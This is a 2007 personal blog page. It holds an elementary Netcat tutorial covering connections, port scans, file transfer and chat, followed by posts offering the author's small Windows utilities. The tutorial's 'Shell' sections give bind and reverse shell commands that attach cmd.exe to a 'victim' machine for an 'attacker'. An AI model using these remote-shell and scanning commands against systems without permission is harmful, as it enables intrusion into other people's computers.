Saturday, October 20, 2007

NetCat Training (Elementary)

*Connecting to Remote Machine (TCP):

nc [Remote Machine IP] [Port Number]
nc 86.0.0.1 80


*Connecting to Remote Machine (UDP):

nc [Remote Machine IP] -u [Port Number]
nc 86.0.0.1 -u 1111


*If you want to see the Details:

Use ' -v ' parameter at end of the command line.
nc 86.0.0.1 80 -v

 More Verbose:
nc 86.0.0.1 80 -vv

*Listen Mode (TCP):

nc -l -p [Port Number]
nc -l -p 1234


*Listen Mode (UDP):

nc -l -u -p [Port Number]
nc -l -u -p 1234


*Port Scanning (TCP):

echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 1-10000


*Port Scanning (UDP):

echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 -u 1-10000


*Send & Recieve File (1):

 File Sending:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
nc -l -p 1234 -s 86.0.0.1 <>

  Recieve the File:
nc [File Sending Machine IP] [Port Number] > [File Destination]
nc 87.0.0.1 1234 > E:\Peace (1).jpg


*Send & Recieve File (2):

File Sending:
nc [Destination Machine IP] [Port Number] < [File Path]
nc 86.0.0.1 1111 <>

 Recieve the File:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
nc -l -p 1111 -s 87.0.0.1 > E:\Peace (1).jpg


*Chatting:

Your Computer:
nc -l -p [Port Number] -s [Remote Machine IP]
nc -l -p 1111 -s 86.0.0.1

Remote Computer:
nc [ Your Computer IP] [Port Number]
nc 87.0.0.1 1111


(Now you can send PM by Console)

*Shell (1):

 Victim Computer:
nc -l -p [Port Number] -e [Console Application Path]
nc -l -p 1234 -e cmd.exe

 Attacker Computer:
nc [Victim Computer IP] [Port Number(Listen Mode)]
nc 86.0.0.1 1234


(Now you can type your command to execute on victim's computer)

*Shell (2):

 Attacker Computer:
nc -l -p [Port Number]
nc -l -p 1234

 Victim Computer:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
nc 87.0.0.1 1234 -e cmd.exe


(When the victim connects to attacker's computer, attacker can type the code to execute on
victim machine)

*Web Server:

Create a Batch file; like ' WebServer.bat '. Insert line below into the batch file:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
...
Batch FileName.bat


nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3
WebServer.bat


(Now type Server IP in your Web Browser(Except Opera))


Note1: We have 65535 Ports.

Note2: If you use ' -d ' parameter at the end of the command, NC will be contiue running
after closing Console Windows (Background Running).

Note3: ' CMD.exe ' (in MS Windows) & ' /bin/sh ' (in Linux)


Download NetCat 1.11
(31 KB - ConsoleApp .EXE)

Sunday, October 7, 2007

TAlarmClock 2.0.0.0 Beta

A useful Digital Alarm Clock for your computer!

409 KB Download (+ VB.net Source)
ZIP = .EXE & .MSI

Unzip and then install!

Sunday, September 16, 2007

TY!IDFinder 1.0.0.3 Beta

YahooIDFinder is an easy-to-use program to find the list of Yahoo!IDs that have been logged in, with Yahoo! Messenger; in the PC.
YahooIDFinder supports Yahoo! Messenger 7.5, 8.0 & 8.1 .

* ID Search
* ID Deleter
* ID List Saver +Report
* Font & Color Settings
* Fast Scanning +Progress Bar

System Requirements:
MS Windows (& Vista) All Version +.NetFramework2.0
500 KB Free space

Download 174KB
Portable Software(.Exe) + VB.net Source

TFileDeleter 1.0.0.0 Beta

TFileDeleter is a software(File Shredder) that deletes your selected files for ever, so you can't recover them.
This software has been test on FAT32 and NTFS, but it may works on another File System[Like: ZFS(Apple MAC, Leopard & Tiger), Type 8E(Fedora Core Linux), Linux Ext3(Common Linux FS), FAT16 & FAT12], too.

System Requirements:
*All MS Windows Version(& Vista) +.NET Framework2.0
*Linux +Mono Project
*Apple MAX OS

**500 KB Free space

Download 141KB
Portable Software(.Exe) + VB.net Source

Thursday, September 13, 2007

TObjectDock 1.0.0.0 Beta

A small and cute dock on your desktop, that helps you to launch your files(All Files Support) very easily.

*10 Buttons
*21 MB - Max Ram Usage
*35% - Max CPU Usage
*All Images supported for 'Button BG Image'
*Unicode Support
*Color & Font Settings for 'Labels'
*Transparent Label BG Color
*Vertical & Horizental mode
*Time & Date view
*Simple Visual ButtonEffect


System Requirements:
All MS Windows Version(& Vista) +.Net Framework2.0
500 KB Freespace on HDD

Download 254KB
Portable File(Exe)  + VB.net Source

Wednesday, September 5, 2007

TObjectDock (Demo Version)

A little dock on your desktop, that you can set it very easily!

*10 Docks
*UniCode Supports
*Font & Color Settings
*All files support
*Most button images support
*Transparent BackColor

Problems:
1-18 MB Ram Usage
2-Problem for Loading Settings form

The problem will be fixed on Beta version! Coming Soon...

Download Demo Version (251 KB, EXE file)
ِ

Saturday, August 18, 2007

TTrainingScreen 1.0.0.0 RC

Download 816 KB

ZIP = EXE + MSI
Unzip the file & then install it.